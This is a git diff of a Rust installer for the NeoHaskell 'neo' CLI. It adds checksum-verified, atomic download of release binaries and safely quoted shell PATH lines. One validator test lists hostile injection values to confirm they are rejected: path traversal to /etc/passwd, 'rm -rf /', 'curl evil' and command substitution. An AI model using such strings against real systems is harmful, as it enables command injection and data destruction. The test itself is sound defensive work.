+        "Release {tag} has no SHA256SUMS entry for '{asset}', so its integrity cannot be verified.\nThis usually means the release is incomplete for your platform. Pick another with NEO_VERSION=neo-vX.Y.Z.\nReleases: https://github.com/neohaskell/NeoHaskell/releases"
+    )]
+    NeoChecksumMissing { asset: String, tag: String },
+
+    #[error(
+        "Checksum mismatch for '{asset}': expected {expected}, got {actual}.\nThe download is corrupt or has been tampered with and was NOT installed. Retry the install; if it persists, report it.\nReport issues: https://github.com/neohaskell/NeoHaskell/issues"
+    )]
+    NeoChecksumMismatch {
+        asset: String,
+        expected: String,
+        actual: String,
+    },
+
     #[error("Installation verification failed: {details}\nReport issues: https://github.com/neohaskell/NeoHaskell/issues")]
     VerificationFailed { details: String },
 
@@ -144,8 +178,109 @@ mod tests {
 
     #[test]
     fn command_failed_exit_code_returns_1() {
-        let io_err = std::io::Error::new(std::io::ErrorKind::Other, "fail");
+        let io_err = std::io::Error::other("fail");
         let err = InstallerError::CommandFailed(io_err);
         assert_eq!(err.exit_code(), 1);
+    }
+
+    #[test]
+    fn invalid_neo_version_message_is_actionable() {
+        let err = InstallerError::InvalidNeoVersion {
+            value: "v1.2.3".into(),
+            details: "must begin with neo-v".into(),
+        };
+        let msg = err.to_string();
+        assert!(msg.contains("v1.2.3"));
+        assert!(msg.contains("neo-v0.1.0"));
+        assert!(msg.contains("unset it to install the newest"));
+    }
+
+    #[test]
+    fn checksum_mismatch_quotes_expected_and_actual_and_says_not_installed() {
+        let err = InstallerError::NeoChecksumMismatch {
+            asset: "neo-x86_64-unknown-linux-gnu".into(),
+            expected: "aaaa".into(),
+            actual: "bbbb".into(),
+        };
+        let msg = err.to_string();
+        assert!(msg.contains("neo-x86_64-unknown-linux-gnu"));
+        assert!(msg.contains("aaaa"));
+        assert!(msg.contains("bbbb"));
+        assert!(msg.contains("NOT installed"));
+    }
+
+    #[test]
+    fn checksum_missing_names_asset_and_tag() {
+        let err = InstallerError::NeoChecksumMissing {
+            asset: "neo-aarch64-apple-darwin".into(),
+            tag: "neo-v0.1.0".into(),
+        };
+        let msg = err.to_string();
+        assert!(msg.contains("neo-aarch64-apple-darwin"));
+        assert!(msg.contains("neo-v0.1.0"));
+    }
+
+    #[test]
+    fn download_failed_names_url_and_offers_pin() {
+        let err = InstallerError::NeoDownloadFailed {
+            url: "https://example/neo".into(),
+            details: "404".into(),
+        };
+        let msg = err.to_string();
+        assert!(msg.contains("https://example/neo"));
+        assert!(msg.contains("NEO_VERSION=neo-vX.Y.Z"));
+    }
+
+    #[test]
+    fn release_resolution_failed_points_at_releases() {
+        let err = InstallerError::NeoReleaseResolutionFailed {
+            details: "no neo-v* release".into(),
+        };
+        assert!(err.to_string().contains("releases"));
+    }
+
+    #[test]
+    fn invalid_bin_dir_message_is_actionable() {
+        let err = InstallerError::InvalidBinDir {
+            value: "relative/bin".into(),
+            details: "it must be an absolute path".into(),
+        };
+        let msg = err.to_string();
+        assert!(msg.contains("relative/bin"));
+        assert!(msg.contains("absolute directory path"));
+        assert!(msg.contains("$HOME/.local/bin"));
+    }
+
+    #[test]
+    fn new_variants_all_exit_1() {
+        let cases: Vec<InstallerError> = vec![
+            InstallerError::InvalidNeoVersion {
+                value: "x".into(),
+                details: "y".into(),
+            },
+            InstallerError::InvalidBinDir {
+                value: "x".into(),
+                details: "y".into(),
+            },
+            InstallerError::NeoReleaseResolutionFailed {
+                details: "x".into(),
+            },
+            InstallerError::NeoDownloadFailed {
+                url: "u".into(),
+                details: "d".into(),
+            },
+            InstallerError::NeoChecksumMissing {
+                asset: "a".into(),
+                tag: "t".into(),
+            },
+            InstallerError::NeoChecksumMismatch {
+                asset: "a".into(),
+                expected: "e".into(),
+                actual: "c".into(),
+            },
+        ];
+        for err in cases {
+            assert_eq!(err.exit_code(), 1, "expected exit 1 for {err:?}");
+        }
     }
 }

--- a/installer/src/install.rs
+++ b/installer/src/install.rs
@@ -2,11 +2,9 @@ use std::process::{Command, Stdio};
 
 use anyhow::Result;
 
-use crate::{detect, error::InstallerError, ui};
+use crate::{detect, error::InstallerError, release, ui};
 
 pub const INSTALL_CMD: &str = "curl --proto '=https' --tlsv1.2 -sSf -L https://install.determinate.systems/nix | sh -s -- install --no-confirm";
-
-pub const NEO_FLAKE_REF: &str = "github:neohaskell/neo#neo-cli";
 
 pub fn install_nix(verbose: bool, dry_run: bool) -> Result<()> {
     if dry_run {
@@ -40,42 +38,23 @@ pub fn install_nix(verbose: bool, dry_run: bool) -> Result<()> {
     }
 }
 
+/// Install the Neo CLI as a prebuilt native binary. Delegates to the
+/// [`crate::release`] module, which downloads a `neo-v*` release asset, verifies
+/// it against SHA256SUMS, and installs it atomically to a user-writable bin dir.
+/// Crucially this does NOT evaluate/compile/install neo from
+/// `github:neohaskell/neo#neo-cli` — Nix is installed (generated projects need
+/// it) but the CLI itself ships as a native binary.
 pub fn install_neo(verbose: bool, dry_run: bool) -> Result<()> {
-    if dry_run {
-        ui::print_step(&format!("Would install Neo CLI from {NEO_FLAKE_REF}"), true);
-        return Ok(());
-    }
-
-    let pb = ui::create_spinner(ui::MSG_NEO_CLI);
-
-    let mut cmd = Command::new(detect::NIX_BIN);
-    cmd.args(["profile", "install", NEO_FLAKE_REF]);
-
-    if verbose {
-        cmd.stdout(Stdio::inherit()).stderr(Stdio::inherit());
-    } else {
-        cmd.stdout(Stdio::piped()).stderr(Stdio::piped());
-    }
-
-    let output = cmd.output().map_err(InstallerError::CommandFailed)?;
-
-    if output.status.success() {
-        ui::finish_success(&pb, "Neo CLI installed");
-        Ok(())
-    } else {
-        ui::finish_error(&pb, "Neo CLI installation failed");
-        let stderr = String::from_utf8_lossy(&output.stderr);
-        Err(InstallerError::NeoInstallFailed {
-            details: stderr.to_string(),
-        }
-        .into())
-    }
+    release::install_neo(verbose, dry_run)
 }
 
 pub fn setup_shell(dry_run: bool) -> Result<()> {
     let shell = detect::get_shell();
     let profile_path = shell_profile_path(&shell)?;
-    let path_line = nix_path_export(&shell);
+    // The native `neo` bin dir + the Nix profile dirs, correctly quoted for the
+    // shell (a $NEO_BIN_DIR override is validated + single-quoted, never
+    // interpolated raw — see release::shell_path_line).
+    let path_line = release::shell_path_line(&shell)?;
 
     if profile_already_configured(&profile_path, &path_line)? {
         return Ok(());
@@ -110,16 +89,6 @@ fn shell_profile_path(shell: &detect::Shell) -> Result<std::path::PathBuf> {
         detect::Shell::Unknown(_) => format!("{home}/.profile"),
     };
     Ok(std::path::PathBuf::from(path))
-}
-
-fn nix_path_export(shell: &detect::Shell) -> String {
-    match shell {
-        detect::Shell::Fish => {
-            "fish_add_path /nix/var/nix/profiles/default/bin $HOME/.nix-profile/bin".to_string()
-        }
-        _ => r#"export PATH="/nix/var/nix/profiles/default/bin:$HOME/.nix-profile/bin:$PATH""#
-            .to_string(),
-    }
 }
 
 fn profile_already_configured(path: &std::path::Path, line: &str) -> Result<bool> {
@@ -171,11 +140,6 @@ mod tests {
     }
 
     #[test]
-    fn neo_flake_ref_is_correct() {
-        assert_eq!(NEO_FLAKE_REF, "github:neohaskell/neo#neo-cli");
-    }
-
-    #[test]
     fn shell_profile_path_zsh() {
         let path = shell_profile_path(&detect::Shell::Zsh).unwrap();
         assert!(path.to_string_lossy().ends_with(".zshrc"));
@@ -188,31 +152,19 @@ mod tests {
     }
 
     #[test]
-    fn nix_path_export_bash_contains_export() {
-        let line = nix_path_export(&detect::Shell::Bash);
-        assert!(line.starts_with("export PATH="));
-    }
-
-    #[test]
-    fn nix_path_export_fish_uses_fish_add_path() {
-        let line = nix_path_export(&detect::Shell::Fish);
-        assert!(line.starts_with("fish_add_path"));
-    }
-
-    #[test]
     fn profile_already_configured_returns_false_for_missing_file() {
         let result = profile_already_configured(
             std::path::Path::new("/tmp/nonexistent_neo_test_file"),
             "test line",
         );
-        assert_eq!(result.unwrap(), false);
+        assert!(!result.unwrap());
     }
 
     #[test]
     fn setup_shell_idempotent() {
         let dir = tempfile::tempdir().unwrap();
         let profile = dir.path().join(".zshrc");
-        let line = nix_path_export(&detect::Shell::Zsh);
+        let line = release::shell_path_line(&detect::Shell::Zsh).unwrap();
         std::fs::write(&profile, &line).unwrap();
         assert!(profile_already_configured(&profile, &line).unwrap());
     }

--- a/installer/src/lib.rs
+++ b/installer/src/lib.rs
@@ -1,6 +1,7 @@
 pub mod detect;
 pub mod error;
 pub mod install;
+pub mod release;
 pub mod ui;
 pub mod verify;
 

--- a/installer/src/release.rs
+++ b/installer/src/release.rs
@@ -1,0 +1,1025 @@
+//! Native Neo CLI release resolution, download, verification, and atomic install.
+//!
+//! Normal users get `neo` as a *prebuilt native binary* downloaded from the
+//! `neohaskell/NeoHaskell` GitHub releases — NOT by evaluating/compiling
+//! `github:neohaskell/neo#neo-cli`. The Neo release train ships assets under
+//! `neo-v*` tags, one asset per supported target, named by the single naming
+//! contract [`neo_asset_name`] shares with the release workflow
+//! (`.github/workflows/neo-release.yml`).
+//!
+//! The pieces here are split into two layers on purpose:
+//!   - **Pure logic** (target mapping, tag selection, asset naming, checksum
+//!     parsing/verification, atomic replacement, dry-run planning). These take
+//!     their inputs as arguments and touch no network, so `--self-test`-grade
+//!     unit tests can prove release selection, asset naming, checksum rejection,
+//!     atomic replacement, and dry-run behavior deterministically.
+//!   - **A single network seam** ([`Fetcher`]) that shells out to `curl` with
+//!     *explicit args* (never a `sh -c` string), so no interpolation/injection
+//!     path exists. Tests substitute an in-memory fetcher and never touch the
+//!     network.
+
+use std::path::{Path, PathBuf};
+
+use anyhow::Result;
+use sha2::{Digest, Sha256};
+
+use crate::error::InstallerError;
+use crate::{detect, ui};
+
+/// The monorepo that publishes Neo CLI releases. Single source of truth shared
+/// with the release workflow and asserted by the consistency tests.
+pub const NEO_REPO: &str = "neohaskell/NeoHaskell";
+
+/// Neo releases are tagged `neo-v*` (independent of the Haskell library tags and
+/// the `installer-v*` tags). Only these tags carry the native `neo` assets.
+pub const NEO_TAG_PREFIX: &str = "neo-v";
+
+/// The checksum manifest published alongside the release assets.
+pub const SHA256SUMS: &str = "SHA256SUMS";
+
+/// Pin a specific release via this environment variable, e.g.
+/// `NEO_VERSION=neo-v0.1.0`. Unset resolves the newest `neo-v*` release.
+pub const NEO_VERSION_ENV: &str = "NEO_VERSION";
+
+/// Override the user-writable directory the native binary is installed into.
+/// Defaults to `$HOME/.local/bin`.
+pub const NEO_BIN_DIR_ENV: &str = "NEO_BIN_DIR";
+
+/// The release-asset name for a target triple. This is THE naming contract: the
+/// release workflow packages each binary as `neo-<target>` and the installer
+/// downloads exactly that. Changing it here means changing it in
+/// `.github/workflows/neo-release.yml` (the consistency tests enforce both move
+/// together).
+pub fn neo_asset_name(target: &str) -> String {
+    format!("neo-{target}")
+}
+
+/// The supported target triples, in the same order the release matrix builds
+/// them. Shared with the consistency tests as the canonical target list.
+pub const NEO_TARGETS: [&str; 4] = [
+    "x86_64-unknown-linux-gnu",
+    "aarch64-unknown-linux-gnu",
+    "x86_64-apple-darwin",
+    "aarch64-apple-darwin",
+];
+
+/// Map a detected OS/arch to the release target triple. Every branch is a
+/// supported target; the caller has already rejected unsupported platforms.
+pub fn release_target(os: &detect::Os, arch: &detect::Arch) -> Result<&'static str> {
+    let target = match (os, arch) {
+        (detect::Os::Linux, detect::Arch::X86_64) => "x86_64-unknown-linux-gnu",
+        (detect::Os::Linux, detect::Arch::Aarch64) => "aarch64-unknown-linux-gnu",
+        (detect::Os::MacOS, detect::Arch::X86_64) => "x86_64-apple-darwin",
+        (detect::Os::MacOS, detect::Arch::Aarch64) => "aarch64-apple-darwin",
+        _ => {
+            return Err(InstallerError::UnsupportedPlatform {
+                os: format!("{os:?}"),
+                arch: format!("{arch:?}"),
+            }
+            .into());
+        }
+    };
+    Ok(target)
+}
+
+/// A pinned `NEO_VERSION` must name a `neo-v*` tag and contain only characters
+/// that are safe in a release-download URL path segment. This rejects any tag
+/// that could smuggle a path traversal or a shell metacharacter into a later
+/// `curl` argument (defense in depth: the download never uses a shell, but a
+/// validated tag is a hard guarantee at the boundary).
+pub fn validate_pinned_version(value: &str) -> Result<String> {
+    let bad = |details: String| InstallerError::InvalidNeoVersion {
+        value: value.to_string(),
+        details,
+    };
+    if !value.starts_with(NEO_TAG_PREFIX) {
+        return Err(bad(format!(
+            "a pinned {NEO_VERSION_ENV} must be a Neo release tag beginning with '{NEO_TAG_PREFIX}' \
+             (for example {NEO_TAG_PREFIX}0.1.0)"
+        ))
+        .into());
+    }
+    let ok = value
+        .chars()
+        .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '-' | '_'));
+    if !ok {
+        return Err(bad(
+            "a release tag may contain only letters, digits, '.', '-' and '_' \
+             (no '/', spaces, or shell metacharacters)"
+                .to_string(),
+        )
+        .into());
+    }
+    Ok(value.to_string())
+}
+
+/// One entry of GitHub's "list releases" response. Only `tag_name` is load-
+/// bearing; the rest of the (large) schema is ignored. Parsed with `serde_json`
+/// so a malformed or unexpected payload is a hard error, never a silently
+/// mis-scanned string.
+#[derive(serde::Deserialize)]
+struct ReleaseEntry {
+    tag_name: Option<String>,
+}
+
+/// Parse a GitHub "list releases" body into its release entries. A body that is
+/// not a JSON array of release objects is a hard, actionable failure.
+fn parse_release_entries(releases_json: &str) -> Result<Vec<ReleaseEntry>> {
+    serde_json::from_str::<Vec<ReleaseEntry>>(releases_json).map_err(|e| {
+        InstallerError::NeoReleaseResolutionFailed {
+            details: format!("could not parse the GitHub releases response as JSON: {e}"),
+        }
+        .into()
+    })
+}
+
+/// The `tag_name` values in a release-list payload, in payload order (the API
+/// returns newest-first). Errors if the payload is not valid releases JSON.
+pub fn parse_tag_names(releases_json: &str) -> Result<Vec<String>> {
+    Ok(parse_release_entries(releases_json)?
+        .into_iter()
+        .filter_map(|e| e.tag_name)
+        .collect())
+}
+
+/// The newest tag that is BOTH a `neo-v*` tag AND passes the same strict
+/// validation a pinned version must pass. Validating here means a malformed or
+/// path-like tag returned by the API can never be selected and interpolated into
+/// a download URL. The API returns newest-first, so the first match is the
+/// newest. Errors only if the payload is not valid releases JSON.
+pub fn newest_neo_tag(releases_json: &str) -> Result<Option<String>> {
+    Ok(parse_tag_names(releases_json)?
+        .into_iter()
+        .find(|t| t.starts_with(NEO_TAG_PREFIX) && validate_pinned_version(t).is_ok()))
+}
+
+/// A hard cap on release-list paging, so a buggy or hostile endpoint that keeps
+/// returning non-empty pages can never spin forever (100 pages × 100/page).
+const MAX_RELEASE_PAGES: u32 = 100;
+
+/// Resolve the tag to install: an explicit pin wins (validated), otherwise page
+/// through the repo's releases newest-first until a VALID `neo-v*` tag turns up.
+/// The repository-wide `releases/latest` redirect is deliberately NOT used — it
+/// points at the newest release of ANY tag prefix (e.g. a Haskell library tag),
+/// which would 404 for the `neo` asset. `fetch_page(n)` returns the JSON for page
+/// `n` (1-based, 100/page); an empty array ends the stream. EVERY candidate tag
+/// is validated before it can be returned, so the caller always builds a URL from
+/// a known-safe tag.
+pub fn resolve_neo_tag(
+    pinned: Option<&str>,
+    fetch_page: impl Fn(u32) -> Result<String>,
+) -> Result<String> {
+    if let Some(p) = pinned {
+        return validate_pinned_version(p);
+    }
+    let mut page = 1u32;
+    while page <= MAX_RELEASE_PAGES {
+        let body = fetch_page(page)?;
+        let entries = parse_release_entries(&body)?;
+        if entries.is_empty() {
+            // Empty/last page — end of stream. Fail loudly below.
+            break;
+        }
+        let found = entries
+            .iter()
+            .filter_map(|e| e.tag_name.as_deref())
+            .find(|t| t.starts_with(NEO_TAG_PREFIX) && validate_pinned_version(t).is_ok());
+        if let Some(tag) = found {
+            return Ok(tag.to_string());
+        }
+        page += 1;
+    }
+    Err(InstallerError::NeoReleaseResolutionFailed {
+        details: format!(
+            "no '{NEO_TAG_PREFIX}*' release found on {NEO_REPO}. \
+             Pin one explicitly with {NEO_VERSION_ENV}={NEO_TAG_PREFIX}X.Y.Z"
+        ),
+    }
+    .into())
+}
+
+/// The expected lowercase-hex SHA256 for `asset` from a `SHA256SUMS` manifest
+/// (the `sha256sum` format: `<hex>␠␠<name>`, where the name may carry a leading
+/// `*` binary marker). `None` if the asset is not listed.
+pub fn expected_checksum(sha256sums: &str, asset: &str) -> Option<String> {
+    for line in sha256sums.lines() {
+        let line = line.trim();
+        if line.is_empty() || line.starts_with('#') {
+            continue;
+        }
+        let mut parts = line.split_whitespace();
+        let hex = parts.next()?;
+        let name = parts.next()?.trim_start_matches('*');
+        if name == asset {
+            return Some(hex.to_ascii_lowercase());
+        }
+    }
+    None
+}
+
+/// The lowercase-hex SHA256 of `bytes`.
+pub fn sha256_hex(bytes: &[u8]) -> String {
+    let mut hasher = Sha256::new();
+    hasher.update(bytes);
+    let digest = hasher.finalize();
+    let mut out = String::with_capacity(digest.len() * 2);
+    for b in digest {
+        out.push_str(&format!("{b:02x}"));
+    }
+    out
+}
+
+/// Verify `bytes` hashes to `expected` (case-insensitive hex). A mismatch is a
+/// hard, actionable failure: the asset is corrupt or tampered and MUST NOT be
+/// installed.
+pub fn verify_sha256(bytes: &[u8], asset: &str, expected: &str) -> Result<()> {
+    let actual = sha256_hex(bytes);
+    if actual.eq_ignore_ascii_case(expected) {
+        Ok(())
+    } else {
+        Err(InstallerError::NeoChecksumMismatch {
+            asset: asset.to_string(),
+            expected: expected.to_ascii_lowercase(),
+            actual,
+        }
+        .into())
+    }
+}
+
+/// Reject a `$NEO_BIN_DIR` that is not a safe, absolute directory path. It must
+/// be absolute and free of control characters (newlines, tabs, NUL, …). Such a
+/// value would otherwise be written into the user's shell profile PATH line and
+/// could corrupt it or — with a newline or an unescaped metacharacter — inject
+/// shell code the next interactive shell would execute. Returns the validated
+/// path; the emission side ([`shell_path_line`]) additionally SINGLE-QUOTES it.
+pub fn validate_bin_dir(raw: &str) -> Result<PathBuf> {
+    let bad = |details: &str| InstallerError::InvalidBinDir {
+        value: raw.to_string(),
+        details: details.to_string(),
+    };
+    if raw.is_empty() {
+        return Err(bad("it is empty").into());
+    }
+    if !raw.starts_with('/') {
+        return Err(bad("it must be an absolute path (start with '/')").into());
+    }
+    if raw.chars().any(|c| c.is_control()) {
+        return Err(bad("it must not contain control characters (newlines, tabs, NUL, …)").into());
+    }
+    Ok(PathBuf::from(raw))
+}
+
+/// The validated `$NEO_BIN_DIR` override, or `None` when unset/empty. Errors when
+/// it is set but invalid, so a bad value fails the install rather than silently
+/// mangling the shell profile.
+pub fn bin_dir_override() -> Result<Option<PathBuf>> {
+    match std::env::var(NEO_BIN_DIR_ENV) {
+        Ok(dir) if !dir.is_empty() => Ok(Some(validate_bin_dir(&dir)?)),
+        _ => Ok(None),
+    }
+}
+
+/// The user-writable directory the native `neo` binary is installed into: a
+/// validated `$NEO_BIN_DIR` override, otherwise `$HOME/.local/bin`.
+pub fn default_bin_dir() -> Result<PathBuf> {
+    if let Some(dir) = bin_dir_override()? {
+        return Ok(dir);
+    }
+    let home = std::env::var("HOME").map_err(|_| InstallerError::NeoInstallFailed {
+        details: "HOME is not set, so the user bin directory cannot be resolved".into(),
+    })?;
+    Ok(PathBuf::from(home).join(".local").join("bin"))
+}
+
+/// POSIX single-quote a string into a single literal shell word (bash/zsh): wrap
+/// in `'…'` and render any embedded `'` as `'\''`. The result cannot be
+/// re-interpreted by the shell — every metacharacter inside is literal.
+pub fn posix_single_quote(s: &str) -> String {
+    format!("'{}'", s.replace('\'', "'\\''"))
+}
+
+/// Fish single-quote a string: inside fish single quotes only `\` and `'` are
+/// special, so escape those (backslash first) and wrap in `'…'`.
+pub fn fish_single_quote(s: &str) -> String {
+    format!("'{}'", s.replace('\\', "\\\\").replace('\'', "\\'"))
+}
+
+/// The shell `PATH` line that puts the native `neo` bin dir (first) plus the Nix
+/// profile dirs on PATH, correctly quoted for `shell`.
+///
+/// The default bin dir is emitted as the literal `$HOME/.local/bin` — our own
+/// constant, safe to let the shell expand. An explicit `$NEO_BIN_DIR` override is
+/// a validated absolute path emitted SINGLE-QUOTED, so no metacharacter (quote,
+/// `$`, `;`, backtick, space, …) in it can be interpreted by the user's shell.
+/// Errors if `$NEO_BIN_DIR` is set but invalid.
+pub fn shell_path_line(shell: &detect::Shell) -> Result<String> {
+    Ok(path_line_for(shell, bin_dir_override()?.as_deref()))
+}
+
+/// Pure PATH-line construction (no env access), so the quoting/injection tests
+/// can exercise arbitrary override values deterministically. `override_dir`, when
+/// present, is an already-validated absolute path.
+fn path_line_for(shell: &detect::Shell, override_dir: Option<&Path>) -> String {
+    let nixp = "/nix/var/nix/profiles/default/bin";
+    match override_dir {
+        None => match shell {
+            detect::Shell::Fish => {
+                format!("fish_add_path $HOME/.local/bin {nixp} $HOME/.nix-profile/bin")
+            }
+            _ => format!(r#"export PATH="$HOME/.local/bin:{nixp}:$HOME/.nix-profile/bin:$PATH""#),
+        },
+        Some(dir) => {
+            let d = dir.to_string_lossy();
+            match shell {
+                detect::Shell::Fish => format!(
+                    "fish_add_path {} {nixp} $HOME/.nix-profile/bin",
+                    fish_single_quote(&d)
+                ),
+                // The override is single-quoted (injection-proof); the remaining
+                // segment is separately double-quoted so $HOME/$PATH still expand.
+                _ => format!(
+                    r#"export PATH={}":{nixp}:$HOME/.nix-profile/bin:$PATH""#,
+                    posix_single_quote(&d)
+                ),
+            }
+        }
+    }
+}
+
+/// Install `bytes` at `dest` atomically: write to a temp file in the *same
+/// directory* (so the final step is a rename on one filesystem — never a
+/// cross-device copy), mark it executable, then rename over `dest`. A reader
+/// either sees the old binary or the new one, never a half-written file, and a
+/// crash mid-download never leaves a corrupt `neo` in place.
+pub fn atomic_install(bytes: &[u8], dest: &Path) -> Result<()> {
+    let dir = dest
+        .parent()
+        .ok_or_else(|| InstallerError::NeoInstallFailed {
+            details: format!(
+                "install destination has no parent directory: {}",
+                dest.display()
+            ),
+        })?;
+    std::fs::create_dir_all(dir).map_err(|e| InstallerError::NeoInstallFailed {
+        details: format!("could not create {}: {e}", dir.display()),
+    })?;
+
+    let mut tmp =
+        tempfile::NamedTempFile::new_in(dir).map_err(|e| InstallerError::NeoInstallFailed {
+            details: format!("could not create a temp file in {}: {e}", dir.display()),
+        })?;
+    use std::io::Write;
+    tmp.write_all(bytes)
+        .map_err(|e| InstallerError::NeoInstallFailed {
+            details: format!("could not write the downloaded binary: {e}"),
+        })?;
+    tmp.flush().ok();
+
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::PermissionsExt;
+        let perms = std::fs::Permissions::from_mode(0o755);
+        std::fs::set_permissions(tmp.path(), perms).map_err(|e| {
+            InstallerError::NeoInstallFailed {
+                details: format!("could not mark the binary executable: {e}"),
+            }
+        })?;
+    }
+
+    tmp.persist(dest)
+        .map_err(|e| InstallerError::NeoInstallFailed {
+            details: format!(
+                "could not atomically install to {}: {}",
+                dest.display(),
+                e.error
+            ),
+        })?;
+    Ok(())
+}
+
+/// Build the download URL for a release asset. `tag` and `asset` are already
+/// validated/derived (no user free-text reaches the shell — there is no shell).
+pub fn asset_download_url(tag: &str, asset: &str) -> String {
+    format!("https://github.com/{NEO_REPO}/releases/download/{tag}/{asset}")
+}
+
+/// The releases-list API URL for page `n` (100/page, newest-first).
+pub fn releases_page_url(page: u32) -> String {
+    format!("https://api.github.com/repos/{NEO_REPO}/releases?per_page=100&page={page}")
+}
+
+/// A one-line, side-effect-free summary of what a real (non-dry) install would
+/// do, printed under `--dry-run`.
+pub fn dry_run_plan(target: &str, pinned: Option<&str>, dest: &Path) -> String {
+    let version = pinned.unwrap_or("<newest neo-v* release>");
+    format!(
+        "Would download {asset} ({version}) from {NEO_REPO}, verify it against {SHA256SUMS}, \
+         and install it atomically to {dest}",
+        asset = neo_asset_name(target),
+        dest = dest.display(),
+    )
+}
+
+// --------------------------------------------------------------------------- //
+// Network seam: `curl` with explicit args (no shell, no interpolation).        //
+// --------------------------------------------------------------------------- //
+
+/// Fetches URLs. The production impl shells out to `curl` with explicit args;
+/// tests use an in-memory impl and never touch the network.
+pub trait Fetcher {
+    fn text(&self, url: &str) -> Result<String>;
+    fn bytes(&self, url: &str) -> Result<Vec<u8>>;
+}
+
+/// Production fetcher: `curl --proto '=https' --tlsv1.2 -fsSL <url>`. Every
+/// argument is a separate `Command` arg — the URL is data, never part of a
+/// shell command string, so there is no interpolation/injection surface.
+pub struct CurlFetcher;
+
+impl CurlFetcher {
+    fn run(&self, url: &str) -> Result<Vec<u8>> {
+        use std::process::Command;
+        let output = Command::new("curl")
+            .args(["--proto", "=https", "--tlsv1.2", "-fsSL", url])
+            .output()
+            .map_err(InstallerError::CommandFailed)?;
+        if output.status.success() {
+            Ok(output.stdout)
+        } else {
+            Err(InstallerError::NeoDownloadFailed {
+                url: url.to_string(),
+                details: String::from_utf8_lossy(&output.stderr).trim().to_string(),
+            }
+            .into())
+        }
+    }
+}
+
+impl Fetcher for CurlFetcher {
+    fn text(&self, url: &str) -> Result<String> {
+        Ok(String::from_utf8_lossy(&self.run(url)?).into_owned())
+    }
+    fn bytes(&self, url: &str) -> Result<Vec<u8>> {
+        self.run(url)
+    }
+}
+
+/// Resolve, download, verify, and atomically install the native `neo` binary.
+/// `pinned` is the validated/None `NEO_VERSION`. All network I/O goes through
+/// `fetch`; all filesystem effects land under `dest`.
+pub fn download_verify_install(
+    fetch: &dyn Fetcher,
+    target: &str,
+    pinned: Option<&str>,
+    dest: &Path,
+) -> Result<String> {
+    let tag = resolve_neo_tag(pinned, |page| fetch.text(&releases_page_url(page)))?;
+    let asset = neo_asset_name(target);
+
+    let sums = fetch.text(&asset_download_url(&tag, SHA256SUMS))?;
+    let expected =
+        expected_checksum(&sums, &asset).ok_or_else(|| InstallerError::NeoChecksumMissing {
+            asset: asset.clone(),
+            tag: tag.clone(),
+        })?;
+
+    let bytes = fetch.bytes(&asset_download_url(&tag, &asset))?;
+    verify_sha256(&bytes, &asset, &expected)?;
+
+    atomic_install(&bytes, dest)?;
+    Ok(tag)
+}
+
+/// Step 3 of the installer: put the native `neo` binary in place.
+pub fn install_neo(verbose: bool, dry_run: bool) -> Result<()> {
+    let os = detect::detect_os();
+    let arch = detect::detect_arch();
+    let target = release_target(&os, &arch)?;
+    let pinned_raw = std::env::var(NEO_VERSION_ENV)
+        .ok()
+        .filter(|s| !s.is_empty());
+    let pinned = pinned_raw.as_deref();
+    let dest = default_bin_dir()?.join("neo");
+
+    if dry_run {
+        ui::print_step(&dry_run_plan(target, pinned, &dest), true);
+        return Ok(());
+    }
+
+    // Validate a pin up front so a bad value fails before any network I/O.
+    if let Some(p) = pinned {
+        validate_pinned_version(p)?;
+    }
+
+    let pb = ui::create_spinner(ui::MSG_NEO_CLI);
+    let fetch = CurlFetcher;
+    match download_verify_install(&fetch, target, pinned, &dest) {
+        Ok(tag) => {
+            ui::finish_success(
+                &pb,
+                &format!("Neo CLI {tag} installed to {}", dest.display()),
+            );
+            if verbose {
+                ui::print_step(
+                    &format!("Installed native asset {}", neo_asset_name(target)),
+                    true,
+                );
+            }
+            Ok(())
+        }
+        Err(e) => {
+            ui::finish_error(&pb, "Neo CLI installation failed");
+            Err(e)
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::cell::RefCell;
+
+    #[test]
+    fn asset_name_is_neo_dash_target() {
+        assert_eq!(
+            neo_asset_name("x86_64-unknown-linux-gnu"),
+            "neo-x86_64-unknown-linux-gnu"
+        );
+        for t in NEO_TARGETS {
+            assert_eq!(neo_asset_name(t), format!("neo-{t}"));
+        }
+    }
+
+    #[test]
+    fn release_target_maps_every_supported_platform() {
+        assert_eq!(
+            release_target(&detect::Os::Linux, &detect::Arch::X86_64).unwrap(),
+            "x86_64-unknown-linux-gnu"
+        );
+        assert_eq!(
+            release_target(&detect::Os::Linux, &detect::Arch::Aarch64).unwrap(),
+            "aarch64-unknown-linux-gnu"
+        );
+        assert_eq!(
+            release_target(&detect::Os::MacOS, &detect::Arch::X86_64).unwrap(),
+            "x86_64-apple-darwin"
+        );
+        assert_eq!(
+            release_target(&detect::Os::MacOS, &detect::Arch::Aarch64).unwrap(),
+            "aarch64-apple-darwin"
+        );
+    }
+
+    #[test]
+    fn release_target_covers_exactly_the_matrix() {
+        let mut mapped: Vec<&str> = vec![
+            release_target(&detect::Os::Linux, &detect::Arch::X86_64).unwrap(),
+            release_target(&detect::Os::Linux, &detect::Arch::Aarch64).unwrap(),
+            release_target(&detect::Os::MacOS, &detect::Arch::X86_64).unwrap(),
+            release_target(&detect::Os::MacOS, &detect::Arch::Aarch64).unwrap(),
+        ];
+        mapped.sort_unstable();
+        let mut expected: Vec<&str> = NEO_TARGETS.to_vec();
+        expected.sort_unstable();
+        assert_eq!(mapped, expected);
+    }
+
+    #[test]
+    fn release_target_rejects_unsupported() {
+        assert!(release_target(
+            &detect::Os::Unsupported("windows".into()),
+            &detect::Arch::X86_64
+        )
+        .is_err());
+        assert!(release_target(
+            &detect::Os::Linux,
+            &detect::Arch::Unsupported("riscv".into())
+        )
+        .is_err());
+    }
+
+    #[test]
+    fn pinned_version_must_be_neo_v_prefixed() {
+        assert!(validate_pinned_version("v0.1.0").is_err());
+        assert!(validate_pinned_version("installer-v0.1.0").is_err());
+        assert_eq!(validate_pinned_version("neo-v0.1.0").unwrap(), "neo-v0.1.0");
+    }
+
+    #[test]
+    fn pinned_version_rejects_injection_characters() {
+        for bad in [
+            "neo-v0.1.0/../../etc/passwd",
+            "neo-v0.1.0;rm -rf /",
+            "neo-v0.1.0 && curl evil",
+            "neo-v0.1.0$(whoami)",
+            "neo-v0.1.0`id`",
+        ] {
+            assert!(
+                validate_pinned_version(bad).is_err(),
+                "should reject {bad:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn parse_tag_names_preserves_order() {
+        let json = r#"[
+          {"tag_name": "core-v9.9.9"},
